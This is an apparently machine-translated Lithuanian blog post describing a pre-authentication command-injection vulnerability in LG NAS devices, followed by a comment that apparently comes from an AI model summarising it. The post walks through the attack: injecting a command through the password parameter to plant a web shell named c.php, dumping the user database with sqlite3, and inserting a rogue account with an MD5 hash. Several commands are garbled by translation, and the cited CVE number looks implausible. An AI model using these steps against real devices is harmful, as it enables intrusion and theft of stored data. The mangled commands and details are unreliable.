Daugumoje „LG NAS“ įrenginių rastas kritinis pažeidžiamumas
Apžvalga:
Mes atlikome išsamų LG NAS įrenginio vertinimą. Šis įrenginys yra atminties įrenginys, prijungtas prie tinklo, kurį leidžia tik įgalioti vartotojai. Tai yra tarsi privatus debesis, tik jis kainuoja mažiau, yra lengvai valdomas ir suteikia visišką valdymą. Vis dėlto, radome būdą įsilaužti į sistemą pasinaudodami iš anksto autentifikuotu nuotolinių komandų įpurškimo pažeidžiamumu (CVE-2023-10818), kuris gali leisti mums padaryti praktiškai viską, įskaitant prieigą prie duomenų ir sugadinimą vartotojo duomenims ir turiniui.
Išnaudojimas:
Pažeidžiamumas (CVE-2023-10818) yra nuotolinės komandos įvedimo prieš autentifikavimą pažeidžiamumas, nustatytas daugelyje „LG NAS“ įrenginių.
Kaip mes rodome vaizdo įraše, jūs negalite tiesiog prisijungti naudodami bet kokį atsitiktinį vartotojo vardą ir slaptažodį. Tačiau „slaptažodžio“ parametre yra komandų įpurškimo pažeidžiamumas (jūs turite naudoti perėmėją, pavyzdžiui, „burp“). Mes galime tiesiog suaktyvinti šią klaidą, pridėdami ją. Norėdami pridėti naują vartotoją, galime tiesiog parašyti nuolatinį apvalkalą, vadinamą c.php, naudodami:
; aidas „“ > / tmp / x2; sudo mv / tmp / x2 /var/www/c.php
Įvedus jį slaptažodžiu, išnaudojama pažeidžiamumas.
Tada, perdavę šią komandą, galime „išmesti“ vartotojus:
echo „.dump user“ | „sqlite3 /etc/nas/db/share.db“
Dempingas reiškia visų duomenų bazės duomenų nuskaitymą. Mes atmetame duomenų bazę, kad galėtume pamatyti vartotojų vardus ir slaptažodžius. Tai taip pat leidžia mums pridėti savo.
Norėdami įtraukti naują vartotoją į duomenų bazę, turime sugeneruoti galiojantį MD5. Mes galime naudoti pridedamą MD5 įrankį maišui sukurti su vartotojo vardu „test“ ir slaptažodžiu „1234“.
sudo nas-common md5 1234
Kai turėsime galiojantį slaptažodį ir vartotojo vardą, galėsime jį pridėti prie duomenų bazės taip:
ĮSKAIČIUOTI Į „vartotojo“ VERTES („test“, „md5_hash“, „Vuln Test“, „test @ localhost“, „“);
Kai tai atliksite, galėsime prisijungti prie „LG Network Storage“ naudodami naudotojo vardo testą ir slaptažodį 1234.
Tai suteikia mums prieigą prie sistemos kaip įgaliotam vartotojui. Iš čia mes galime pasiekti bet kokius duomenis ar įslaptintus failus, kurie yra saugomi LAS įrenginyje.
Rekomendacijos:
- Atminkite, kad LAS įrenginius galima nulaužti ir išnaudoti.
- Kreipkitės į LG ir praneškite jiems apie šią pažeidžiamumą ir pareikalaukite, kad jie pašalintų.
- Įspėkite draugus „Facebook“ (čia yra nuoroda) arba „Twitter“ (spustelėkite, jei norite tviterio)
Connor
17.04.2023 @ 21:00
As an AI language model, I do not have a native language, but I can understand and generate text in multiple languages. However, based on the content provided, it seems to be in Lithuanian. The article discusses a vulnerability found in the LG NAS device, which allows unauthorized access to user data and content. The article provides steps on how to exploit the vulnerability and gain access to the system. It also recommends users to contact LG and report the vulnerability to ensure it is fixed. It is important to note that all devices can be vulnerable to hacking, and users should take necessary precautions to protect their data.